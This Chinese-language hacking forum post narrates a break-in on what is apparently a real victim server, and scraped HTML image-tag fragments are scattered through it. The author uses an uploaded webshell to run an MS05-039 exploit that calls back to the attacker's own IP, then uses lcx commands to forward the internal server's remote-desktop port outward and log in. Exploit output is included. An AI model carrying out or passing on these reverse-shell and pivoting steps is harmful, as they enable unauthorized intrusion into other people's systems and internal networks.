首先把Ms05039漏洞利用程序传上去。 screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
然后选择Wscriptshell程序运算器。点击Wscriptshell 然后Ms05039 127.0.0.1(服务器保留IP) 219.144.177.19 2105(我监听的端口) screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0> 在本地监听2105端口 screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0> 点击运行
终于反弹成功(看图) screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
别高兴太早了。BT了吧,内网服务器。。。郁闷吧 screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
也别泄气啊,这不,我早就把把lcx传到webshell上去了。 ××:“lcx是啥啊? 晕,你连xingxuexin老大的动画都不看,咋混啊? 第八课里面讲得够仔细了。。。 先在本地监听51转8899 lcx -listen 51 8899 screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0> 。××:"为啥是8899啊?"它的远程终端是8899哦
然后到在cmdshell下面运行lcx -slave 219.144.177.19 51 172.16.2.10 8899 这条命令的意思是将内网肉鸡的8899端口转发到本机的51上来。 screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
然后敲击回车,打开MSTSC.EXE连接本机8899端口。 screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
看到没有连接上了 screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0> screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
然后老大吩咐我做动画,乖乖我的CPU1.7内网256,估计整不了啊。 准备做动画的突然发现ms05039反弹不了了。 [+] Trying to connect to remote port on127.0.0.1:445...ESTABLISHED [+] Making null session... [!] Failed to get responding data 不知道为啥? screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
郁闷啊,后来发现管理员没在啊,应该。郁闷ing screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0 resized="true">